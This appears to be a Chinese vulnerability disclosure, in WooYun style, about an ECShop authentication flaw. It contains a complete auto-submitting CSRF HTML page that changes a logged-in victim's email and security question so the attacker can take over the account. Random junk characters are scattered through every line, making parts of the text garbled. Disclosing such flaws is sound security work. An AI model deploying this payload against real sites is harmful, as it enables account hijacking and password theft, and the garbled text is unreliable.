简要描述:
3 l' S9 z9 Q) M" m, Gecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现1 z r6 {8 W/ w% Q& Z
! {% f3 c f, ?4 R8 ]5 F: b# M: sDemo For:http://www.wooyun.org/bug.php?action=view&id=395
$ y# ^6 {1 p9 T8 l1 f% ?6 X! s, K$ a# o" L0 [& l2 n3 |8 T
详细说明:
/ ^+ I4 U9 y+ C2 W4 L利用csrf和xss可以突破官方所说的“障碍”5 ?9 F* Z4 ?' ^' ^/ A& x! }
xss版本已经有人说明
4 @" q7 J/ A2 R7 c2 O这里给出csrf版本' P6 [2 v! ]4 a( j+ [
h& D1 B t# ~; U1 r- E- ?8 f
漏洞证明:
" {' d- K( I9 o/ f+ N* }2 Q% {<html>0 X* e% O, L+ s& h; c
<body>, L5 q* H0 d3 f0 E$ w: m/ n
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">) D% y: I" ^% `7 |
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
9 X, K* {/ C+ s- K# [+ Y: [6 r3 w<INPUT TYPE="text" NAME="act" value="act_edit_profile">( D a+ l$ v7 n; h5 U# _
<INPUT TYPE="text" NAME="sel_question" value="ecshop">5 ^, N' r& C8 e% U z8 V$ p3 a
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">3 J( L* k7 P. ^( G9 L
</body>
9 x- _, Y3 S% V! W5 ^& `<script>2 F7 m3 i+ W3 m% z8 U6 {6 _6 [
document.forms[0].submit();
+ z- L+ ~* x+ }4 z</script>6 u; ?: P. }+ K% H" y% Y
</html>& p M& ^, c8 a. l7 y: D
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失5 p" C4 x( n5 |* P
- ?) a6 l( c# V% s; V# D( R |